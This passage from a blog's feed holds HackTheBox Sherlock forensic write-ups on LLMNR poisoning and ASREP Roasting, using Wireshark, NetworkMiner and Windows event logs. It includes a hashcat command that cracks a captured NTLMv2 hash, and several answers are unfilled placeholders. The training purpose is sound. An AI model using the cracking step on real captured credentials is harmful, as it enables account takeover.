srcset="https://substackcdn.com/image/fetch/$s_!TUoc!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4501b27-7051-42f0-82f9-6ba53d879e24_1063x259.png 424w, https://substackcdn.com/image/fetch/$s_!TUoc!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4501b27-7051-42f0-82f9-6ba53d879e24_1063x259.png 848w, https://substackcdn.com/image/fetch/$s_!TUoc!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4501b27-7051-42f0-82f9-6ba53d879e24_1063x259.png 1272w, https://substackcdn.com/image/fetch/$s_!TUoc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa4501b27-7051-42f0-82f9-6ba53d879e24_1063x259.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>5. What was the typo made by the victim when navigating to the file share that caused his credentials to be leaked?</strong></p><p><strong>Approach:</strong></p><ul><li><p>In NetworkMiner, search for DNS queries related to LLMNR (port 5355).</p></li><li><p>Identify the typo in the requested resource name.</p></li></ul><p><strong>Answer:</strong></p><ul><li><p>The typo made by the victim: <a href="file://incorrect-share-name">\\incorrect-share-name</a> (replace with actual typo).</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!zlUV!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ec32599-4d43-4e58-93b4-34d343a9b533_970x493.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!zlUV!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ec32599-4d43-4e58-93b4-34d343a9b533_970x493.png 424w, https://substackcdn.com/image/fetch/$s_!zlUV!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ec32599-4d43-4e58-93b4-34d343a9b533_970x493.png 848w, https://substackcdn.com/image/fetch/$s_!zlUV!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ec32599-4d43-4e58-93b4-34d343a9b533_970x493.png 1272w, https://substackcdn.com/image/fetch/$s_!zlUV!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ec32599-4d43-4e58-93b4-34d343a9b533_970x493.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!zlUV!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ec32599-4d43-4e58-93b4-34d343a9b533_970x493.png" width="970" height="493" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5ec32599-4d43-4e58-93b4-34d343a9b533_970x493.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:493,&quot;width&quot;:970,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!zlUV!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ec32599-4d43-4e58-93b4-34d343a9b533_970x493.png 424w, https://substackcdn.com/image/fetch/$s_!zlUV!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ec32599-4d43-4e58-93b4-34d343a9b533_970x493.png 848w, https://substackcdn.com/image/fetch/$s_!zlUV!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ec32599-4d43-4e58-93b4-34d343a9b533_970x493.png 1272w, https://substackcdn.com/image/fetch/$s_!zlUV!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5ec32599-4d43-4e58-93b4-34d343a9b533_970x493.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>6. To get the actual credentials of the victim user, we need to stitch together multiple values from the NTLM negotiation packets. What is the NTLM server challenge value?</strong></p><p><strong>Approach:</strong></p><ul><li><p>Apply the same filter for NTLM traffic.</p></li><li><p>Locate the NTLM negotiation packets (type 2 messages) to find the challenge value.</p></li></ul><p><strong>Answer:</strong></p><ul><li><p>The NTLM server challenge value is 0xXXXXXXXX (replace with actual hex value).</p></li></ul><p><strong>7. Now doing something similar, find the NTProofStr value.</strong></p><p><strong>Approach:</strong></p><ul><li><p>Open the PCAP in Wireshark.</p></li><li><p>Filter for "ntlmssp" to view NTLM authentication messages.</p></li><li><p>Focus on the type 3 (AUTH) message to extract the NTProofStr.</p></li></ul><p><strong>Answer:</strong></p><ul><li><p>The NTProofStr value is 0xXXXXXXXX (replace with actual hex value).</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7z57!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7228146-75b1-43b0-8c5a-4e56e2c157ec_2131x926.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7z57!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7228146-75b1-43b0-8c5a-4e56e2c157ec_2131x926.png 424w, https://substackcdn.com/image/fetch/$s_!7z57!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7228146-75b1-43b0-8c5a-4e56e2c157ec_2131x926.png 848w, https://substackcdn.com/image/fetch/$s_!7z57!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7228146-75b1-43b0-8c5a-4e56e2c157ec_2131x926.png 1272w, https://substackcdn.com/image/fetch/$s_!7z57!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7228146-75b1-43b0-8c5a-4e56e2c157ec_2131x926.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7z57!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7228146-75b1-43b0-8c5a-4e56e2c157ec_2131x926.png" width="1456" height="633" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b7228146-75b1-43b0-8c5a-4e56e2c157ec_2131x926.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:633,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!7z57!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7228146-75b1-43b0-8c5a-4e56e2c157ec_2131x926.png 424w, https://substackcdn.com/image/fetch/$s_!7z57!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7228146-75b1-43b0-8c5a-4e56e2c157ec_2131x926.png 848w, https://substackcdn.com/image/fetch/$s_!7z57!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7228146-75b1-43b0-8c5a-4e56e2c157ec_2131x926.png 1272w, https://substackcdn.com/image/fetch/$s_!7z57!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb7228146-75b1-43b0-8c5a-4e56e2c157ec_2131x926.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>8. To test the password complexity, try recovering the password from the information found from packet capture. This is a crucial step as this way we can find whether the attacker was able to crack this and how quickly.</strong></p><p><strong>Approach:</strong></p><ul><li><p>Collect the NTLMv2 hash components.</p></li><li><p>Use hashcat with the RockYou wordlist to attempt password cracking.</p></li><li><p>Command example: hashcat -m 5600 captured_hash.txt rockyou.txt</p></li></ul><p><strong>Answer:</strong></p><ul><li><p>The cracked password is password-value (replace with actual password).</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!yhJN!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c5b9240-76ef-40a0-a622-52aac0b545e5_2536x62.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!yhJN!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c5b9240-76ef-40a0-a622-52aac0b545e5_2536x62.png 424w, https://substackcdn.com/image/fetch/$s_!yhJN!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c5b9240-76ef-40a0-a622-52aac0b545e5_2536x62.png 848w, https://substackcdn.com/image/fetch/$s_!yhJN!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c5b9240-76ef-40a0-a622-52aac0b545e5_2536x62.png 1272w, https://substackcdn.com/image/fetch/$s_!yhJN!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c5b9240-76ef-40a0-a622-52aac0b545e5_2536x62.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!yhJN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c5b9240-76ef-40a0-a622-52aac0b545e5_2536x62.png" width="1456" height="36" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5c5b9240-76ef-40a0-a622-52aac0b545e5_2536x62.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:36,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!yhJN!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c5b9240-76ef-40a0-a622-52aac0b545e5_2536x62.png 424w, https://substackcdn.com/image/fetch/$s_!yhJN!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c5b9240-76ef-40a0-a622-52aac0b545e5_2536x62.png 848w, https://substackcdn.com/image/fetch/$s_!yhJN!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c5b9240-76ef-40a0-a622-52aac0b545e5_2536x62.png 1272w, https://substackcdn.com/image/fetch/$s_!yhJN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c5b9240-76ef-40a0-a622-52aac0b545e5_2536x62.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>9. Just to get more context surrounding the incident, what is the actual file share that the victim was trying to navigate to?</strong></p><p><strong>Approach:</strong></p><ul><li><p>In Wireshark, filter for "SMB" or "SMB2".</p></li><li><p>Identify the file share path in the SMB protocol details.</p></li></ul><p><strong>Answer:</strong></p><ul><li><p>The file share is <a href="file://server/share-name">\\server\share-name</a> (replace with actual file share path).</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!j8-9!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F51fea8f8-6053-4cda-8ddb-3f47c12ced9b_1575x484.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!j8-9!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F51fea8f8-6053-4cda-8ddb-3f47c12ced9b_1575x484.png 424w, https://substackcdn.com/image/fetch/$s_!j8-9!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F51fea8f8-6053-4cda-8ddb-3f47c12ced9b_1575x484.png 848w, https://substackcdn.com/image/fetch/$s_!j8-9!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F51fea8f8-6053-4cda-8ddb-3f47c12ced9b_1575x484.png 1272w, https://substackcdn.com/image/fetch/$s_!j8-9!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F51fea8f8-6053-4cda-8ddb-3f47c12ced9b_1575x484.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!j8-9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F51fea8f8-6053-4cda-8ddb-3f47c12ced9b_1575x484.png" width="1456" height="447" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/51fea8f8-6053-4cda-8ddb-3f47c12ced9b_1575x484.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:447,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!j8-9!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F51fea8f8-6053-4cda-8ddb-3f47c12ced9b_1575x484.png 424w, https://substackcdn.com/image/fetch/$s_!j8-9!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F51fea8f8-6053-4cda-8ddb-3f47c12ced9b_1575x484.png 848w, https://substackcdn.com/image/fetch/$s_!j8-9!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F51fea8f8-6053-4cda-8ddb-3f47c12ced9b_1575x484.png 1272w, https://substackcdn.com/image/fetch/$s_!j8-9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F51fea8f8-6053-4cda-8ddb-3f47c12ced9b_1575x484.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>Conclusion:</strong> The analysis confirmed that an LLMNR poisoning attack was conducted by a rogue device, capturing and potentially cracking victim credentials. By identifying the attacker&#8217;s IP, hostname, and the NTLM components, appropriate remediation steps can be taken to strengthen network defenses against such attacks.</p>]]></content:encoded></item><item><title><![CDATA[HackTheBox: Campfire-2]]></title><description><![CDATA[Sherlock]]></description><link>https://www.byteberzerker.com/p/hackthebox-campfire-2</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hackthebox-campfire-2</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Fri, 03 Jan 2025 23:00:45 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!IVLc!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb767224c-8b75-4fea-9acb-272ca92bbb7d_2354x892.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Scenario:</strong> Forela's Network is under attack, with an alert raised about an old admin account requesting a ticket from the KDC on a domain controller. This account is marked inactive in the inventory, and the investigation aims to determine if this is an ASREP Roasting attack, where an attacker can request tickets for users with preauthentication disabled.</p><p><strong>1. When did the ASREP Roasting attack occur, and when did the attacker request the Kerberos ticket for the vulnerable user?</strong></p><p>To determine when the attack occurred:</p><ul><li><p>Process the provided security event logs using EvtxECmd.</p></li><li><p>Command: EvtxECmd.exe -f Security.evtx --csv C:\Users\Username\Desktop\</p></li><li><p>Open the generated CSV file in Timeline Explorer.</p></li><li><p>Filter by <strong>Event ID 4768</strong>.</p></li><li><p>Check the <strong>Payload Data6</strong> column for entries containing "Logon without Pre-Authentication," indicating an ASREP Roasting event.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!IVLc!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb767224c-8b75-4fea-9acb-272ca92bbb7d_2354x892.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!IVLc!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb767224c-8b75-4fea-9acb-272ca92bbb7d_2354x892.png 424w, https://substackcdn.com/image/fetch/$s_!IVLc!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb767224c-8b75-4fea-9acb-272ca92bbb7d_2354x892.png 848w, https://substackcdn.com/image/fetch/$s_!IVLc!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb767224c-8b75-4fea-9acb-272ca92bbb7d_2354x892.png 1272w, https://substackcdn.com/image/fetch/$s_!IVLc!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb767224c-8b75-4fea-9acb-272ca92bbb7d_2354x892.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!IVLc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb767224c-8b75-4fea-9acb-272ca92bbb7d_2354x892.png" width="1456" height="552" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b767224c-8b75-4fea-9acb-272ca92bbb7d_2354x892.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:552,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!IVLc!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb767224c-8b75-4fea-9acb-272ca92bbb7d_2354x892.png 424w, https://substackcdn.com/image/fetch/$s_!IVLc!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb767224c-8b75-4fea-9acb-272ca92bbb7d_2354x892.png 848w, https://substackcdn.com/image/fetch/$s_!IVLc!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb767224c-8b75-4fea-9acb-272ca92bbb7d_2354x892.png 1272w, https://substackcdn.com/image/fetch/$s_!IVLc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb767224c-8b75-4fea-9acb-272ca92bbb7d_2354x892.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>2. Please confirm the User Account that was targeted by the attacker.</strong></p><ul><li><p>Continue filtering for <strong>Event ID 4768</strong>.</p></li><li><p>Scroll to the <strong>Payload Data1</strong> column to identify the username of the targeted account.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!poH0!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccfc304d-f8fc-42d2-87a7-5b6e18ef31aa_424x380.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" 